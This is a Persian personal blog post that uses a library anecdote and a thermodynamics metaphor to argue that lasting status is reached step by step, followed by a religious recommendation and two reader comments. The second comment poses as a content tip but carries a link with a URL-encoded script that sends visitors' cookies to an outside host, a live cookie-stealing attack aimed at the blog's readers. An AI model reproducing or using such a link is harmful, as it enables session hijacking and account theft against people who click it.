انسام و جایگاهش

سلام به تمام دوستان و دشمنان من.

البته من که دشمن ندارم. یعنی سعی میکنم که دشمن نداشته باشم. ولی خوب ماهم آدمیم دیگه میدونم که خیلی ها با من حال نمیکنن. خوب منم با اونا حال نمیکنم. این به اون در.

دیروز یعنی یکشنبه 28 ام توی کتابخونه دانشکده نشسته بودم و جای شما خالی، کلیات آلیاژهای آهنی رو میخوندم. کتابخونه خیلی خلوت بود. یهو دیدم که یکی از بچه ها  که ترم آخره و شاگرد اول دانشکده مهندسی پلیمره اومد . خوب ما با هم یه سلام و علیکی داریم. از پشت میزم بلند شدم وبه سمتش رفتم و چند دقیقه ای رو با هم گل گفتیم و گل شنیدیم.

بعد هر کدوم به کار خودمون مشغول شدیم. بعد از مدتی اون رفت .و بعدش یکی دیگه اومد و پشت همون میز نشست که آقای مهندس پشتش نشسته بود. جالب بود چون فکر کرده بود اومده کافی شاپ ،چون اومده بود توی کتابخونه تا تناول اجزای خارجی به داخلی بدن رو انجام بده.(شایدم پروژش بوده ما که نمیدونیم). خلاصه دیدم میزی رو که تا چند دقیقه پیش همه دورش بودن و یه جوری نگاهش میکردن چه طوری در عرض چند ثانیه از چشم همه افتاد و همه از گرد اون پراکنده شدن.

این مثال یک مثال عینی از زندگیه . افراد هستند که یه جایگاهی رو بزرگ میکنند ، نه اینکه یه جایگاهی فردی رو بزرگ بکنه . حالا ممکنه که یه جایگاه بزرگ ، کسی رو هم بزرگ کنه . ولی این بزرگی دوام پیدا نمیکنه.

ای کاش هر کسی در زمان مناسب در جایگاه خودش قرار بگیره. تقریبا همه ما آدما میتونیم که خودمون رو بزرگ کنیم .و در جایگاه بزرگان قرار بگیریم. ولی یادمون باشه که اگر بزرگی رو پایدار میخوایم . باید از جایگاه های کوچیکتر به بزرگتر بریم. این یه اصل ساده از ترمودینامیکه . تمام کائنات به سمت پایداری انرژیتیک پیش میرن. و پایداری در جهتی به بهترین صورت اعمال میشود که فاصله انرژی (driving force) و انرژی(activation) در یه حد تعادل قرار بگیره.

پس حواسمون به (Gap) ها و فاصله هایی که خودمون ناآگاهانه برای خودمون ایجاد میکنیم باشه. چون ترمودینامیک میگه که اگه کنترل شده نباشه کله پا میشیم. تجربیات زندگی و اندرزهای نیاکان هم حرف ترمودینامیک رو تصدیق میکنه.

(شاید هم ترمودینامیک حرف اونها رو تصدیق و تائید میکنه.نظرشما چیه؟)

از اساتیدی که (یعنی همه شما) این مطلب رو خوندن هم عذر میخوام من کوچیکتر از اونم که بخوام قواعد پیچیده ترمودینامیک رو عنوان کنم. صرفا قصدم تقریب به ذهن بود. وگرنه خودم هم میدونم که حرفم از لحاظ علمی یه گیر کوچیک داره. (اگه گفتین چی بود؟) ولی بازم در کل قضیه تفاوتی ایجاد نمیکنه.

یه خواهش:

خواهش میکنم یا خطبه غدیر رو نخونید یا اگه میخونید با دقت به تما م کلمات اون دقت کنیند. این حرفها .حرف هیچ انسانی نیست. این حرف خداوند به پیغمبرش هست که از او خواسته تا عین به عین به مردم ابلاغ بشه و گفته که اگر این کار رو نکنه تمام این مدت که رسالت او را عهده دار بوده از بین میره و ارزشش رو از دست میده.

اوست آفریننده آسمانها و گستراننده زمین ها و حکمران آنها (از طرف خداوند به ما)

دور و منزه از خصایص آفریده هاست و در منزه بودن خود نیز از تقدیس همگان برتر است. هموست پروردگار فرشتگان و روح ِ افزونی بخش آفریده ها و نعمت ده ایجاد شده ها.

من خودم یکی از سوالات اعتقادی خودم رو که هیچ جوابی براش پیدا نکرده بودم رو بعد از مطالعه این خطبه پیدا کردم. جواب بر خلاف تصور همه تا اندازه ای با اسلام الان تفاوت داره.

موفق باشید.

نظرات 2 + ارسال نظر
ساقی یکشنبه 5 اسفند‌ماه سال 1386 ساعت 11:02 ق.ظ http://kolbekoochik.blogfa.com

سلام آقا هادی
متن قشنگی بود . چرا خودتونو دست کم می گیرین
من با اینکه از ترمودینامیک چیز زیادی نمی دونم اما احساس کردم خیلی خوب مبحث ترمودینامیک و کائنات رو به هم مربوط کردین
من خودم به شخصه اعتقاد دارم که یک رابطه ای بین قوانین فیزیکی و طبیعت اطراف ما هست و خیلی دلم میخواد این رابطه ها رو کشف کنم
موفق باشین

ای ول شنبه 11 اسفند‌ماه سال 1386 ساعت 08:09 ق.ظ

ما مطلب خوبی برای شما داریم

در وب سایت زیر

http://blogsky.com/search.bs?q=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Frewq312.freewebhostingpro.com%2Fdocuments.php%3Fc%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E&x=73&y=14

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد